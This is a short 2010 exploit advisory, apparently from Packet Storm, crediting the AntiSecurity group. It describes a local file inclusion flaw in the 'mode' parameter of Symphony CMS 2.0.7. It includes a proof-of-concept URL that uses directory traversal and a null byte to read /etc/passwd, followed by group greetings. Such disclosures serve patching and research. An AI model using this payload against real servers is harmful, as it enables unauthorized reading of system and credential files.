Symphony CMS 2.0.7 Local File Inclusion

2010-05-30T00:00:00
ID PACKETSTORM:90107
Type packetstorm
Reporter AntiSecurity
Modified 2010-05-30T00:00:00

Description

                                        
                                            `  
=============================================================================================================  
  
  
[o] Symphony CMS Local File Inclusion Vulnerability  
  
Software : Symphony CMS version 2.0.7  
Download : http://symphony-cms.com/download/releases/current/  
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]  
Contact : public[at]antisecurity[dot]org  
Home : http://antisecurity.org/  
  
  
=============================================================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/index.php?mode=[LFI]  
  
  
[o] PoC  
  
http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00  
  
  
=============================================================================================================  
  
  
[o] Greetz  
  
Angela Zhang stardustmemory aJe martfella Genex  
H312Y }^-^{ matthews wishnusakti xrootboy  
k1tk4t str0ke kaka11 inc0mp13te pizzyroot  
ArRay bjork xmazinha veter f1  
all people in #evilc0de [at] irc.byroe.net  
  
  
=============================================================================================================  
  
  
[o] May 30 2010 - GMT +07:00 Jakarta, Indonesia  
`